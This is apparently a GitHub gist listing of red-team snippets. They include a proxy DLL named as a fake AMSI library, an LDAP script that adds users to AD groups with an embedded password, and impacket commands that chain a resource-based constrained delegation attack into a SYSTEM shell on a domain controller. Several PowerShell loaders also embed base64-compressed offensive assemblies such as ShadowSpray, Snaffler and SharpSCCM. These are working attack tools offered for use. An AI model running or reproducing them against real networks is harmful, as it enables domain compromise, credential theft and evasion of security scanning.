eversinc33
/ fakeAmsiDll.cpp
Created
June 6, 2023 17:36
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // dllmain.cpp : Defines the entry point for the DLL application. | |
| #include "pch.h" | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #define _CRT_SECURE_NO_DEPRECATE | |
| #pragma warning (disable : 4996) | |
| // generated with sharpdllproxy. |
eversinc33
/ add_to_group.py
Created
February 14, 2023 16:24
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import ldap3, json | |
| from ldap3.extend.microsoft.addMembersToGroups import ad_add_members_to_groups | |
| domain = "test.local" | |
| dc_host = "dc.test.local" | |
| domain_cn = "".join([f"DC={x}," for x in domain.split('.')])[:-1] | |
| bind_dn = <DN TO BIND> | |
| bind_pw = "Winter2023!" | |
| user_dn = <DN FOR USER TO ADD> | |
| group_dn = <GROUP TO ADD USER TO> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # add computer account | |
| impacket-addcomputer domain/user:Password -dc-ip dc.domain.local | |
| # add RBCD to added computer | |
| impacket-rbcd domain/user:Password -delegate-to 'DC$' -dc-ip dc.domain.local -action write -delegate-from 'DESKTOP-XC3RS3G7$' | |
| # get ticket for dc cifs for Administrator | |
| impacket-getST -spn 'cifs/dc.domain.local' -impersonate Administrator -dc-ip dc.domain.local 'DOMAIN/DESKTOP-XC3RS3G7$:w06DJlMdlKNUVSpqN0olSEctZHZEQgZU' | |
| # use ticket to get shell as SYSTEM |
eversinc33
/ shad0w_pr4y
Last active
October 14, 2022 11:38
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-ShadowSpray | |
| { | |
| $a=New-Object IO.MemoryStream(,[Convert]::FromBAsE64String("H4sIAAAAAAAEANS9CZwcVdU3XF1VXVVdvcxU90x1z0wyPUmYoehl1pAVSNglLEIIOBMgCUlYEoEK1QGVyQxRJCJLJCiIERCjKI8LKuLyuOKOIigREVEjoiIqAuqDj+vkO/9zb1V3Tyb6vO/7+S35ZaruOXc799xzzz3n3lu3T119s6IpiqLT3/79ivJpRfxbrvzrf9vpL1P8TEZ5IPHInE/HTnlkzqqLN9V6tgT+RcH5l/ZsOP+yy/ytPesv6AmuuKxn02U9x73yzJ5L/Y0X9KfT9iGyjNOPV5SNO1Sl8s4XHwnLfUmZqyTVQUW5N64oRkOFPYK0WBhWBd34V09mMB7/NGXdtVFLoga1NpbViGn+93Rc+Vz84G2/+1NxZdHBo//1P6r/FQ1g/9YLXruV3tveHxe0oe3qAVnW9Qe1YAOFmbanJX8+0Ezo8v9Z9/E/0KAqcaXw65jS83VNAW9rqmIs+khcudj6nzenWx0/VFHsEr09vM9WvcPorWoTQKv6BGMVJTeoKUdTeqrH0a7IKUqXrRr9843KgFdCQi7F4Kdfpkcl71UY7zEeT7+KotxSvrS3Z/7L20d6DjvrrHtWN2T3++kxKtH13P4A0EyDqaznditOW0CUbCnc1E4k9boiv51Vei93ibQb8ajqfW3l5JSLsE9Cae/pzYsCk9lY7+V5pMs3pMtH6byheptvViCPilP7vKkYtqFObNEU3RjHs5oMiLIttWFKfZVA+SMo3jCvmE1kTficFM/KK43J+RQ1cTlQ3uEU1PwFQARATBlfoNJrCwnhJUk0CPHF6YgHmxCllapPYmxXk95ietWWgAZ0oklDq3SCOk40671Vta/kL+XG5AZ15QzZ56p3BKpGUrWG3p5IIKjpGcM7mwpX4xPIrmb0CZ3f8Yk4v80JA+9xIyzc9Y9E6SsaUJ |
eversinc33
/ snuffle
Created
October 13, 2022 14:22
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-Snaffler | |
| { | |
| [CmdletBinding()] | |
| Param ( | |
| [String] | |
| $Command = "-u -s -y -o .\schnuffl.tsv" | |
| ) | |
eversinc33
/ sccm
Created
October 13, 2022 14:00
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-SharpSCCM | |
| { | |
| [CmdletBinding()] | |
| Param ( | |
| [String] | |
| $Command = " " | |
| ) | |
| $a=New-Object IO.MemoryStream(,[Convert]::FromBAsE64String("H4sIAAAAAAAEANS9B5gcxdEGPDuzO7PxdHN72r0g6Q5JJ4Y9EEKAuDsJSUSTs0EiCIFJwpiBWUQ6bhHRNkgiB2NyBmNjgskZTAaLYLIwwQaBM87Yn/jrreqemb29s/i+53/+5/kFtzNT3VVdnaqqu6u7d9z7XMMyDCNJf199ZRj3GfJvrrHmf0vor6nrgSbj7sxLa92X2OGltfY4bFG1+6jAPzQ44Dvd3zrgyCP9Y7oPPLg7WHxk96Iju7fceffu7/gHHTy1UMhOVjR22cowDjrTMpa423xL0/2TMdHImWl6G2sYaYFN76L37hhneDeFb8OInsbCsQzHP8tYeIZhNMtHs44w/Lvu1XhvwlhjD6Y/1nggNUKm54418uCb+Bn3NcooRKP46TiA+N8m9jn1mIOPP4aeD37VqvIZ5SOGsnBqUA1QUMwb8WjY9DTH1qdF/08NDj7Cp4h5xTPTSjfE2xw8mEbK6HstZVy7/RgjQd8LieoHd6WMeV1fP3/FaS3GxerdLA+hZkyPiGWtARRvQK9HBZT8UVUKyp6YEui2gO4eQpMCHQL0nBBqWh5l0jY9yrKd9Km1Zs2UlwaoKell8ZQwnxpBdsI+Qwkkbg7isYzgiSFCSVbohcJnm1Yy1b2KIODOrhSnZaW4wbcFMtmkT8ll+TXFr5QKxx2GbwE2wRy0QX2iaQ3ZkoxBMEfDnAiW1rC0ghWnpY0CUab/XYs5zZZy5mAK7A9SWsn5+XRp9icU00rPQocxB60wzC5ZnoOikE9r3hBDK/Vx0ipOqacwBLoZjuWk5+X6loOuM7+YTPrEUDZ4nArcy9BbfwuSMksetR2by66vwJByBHGTUr |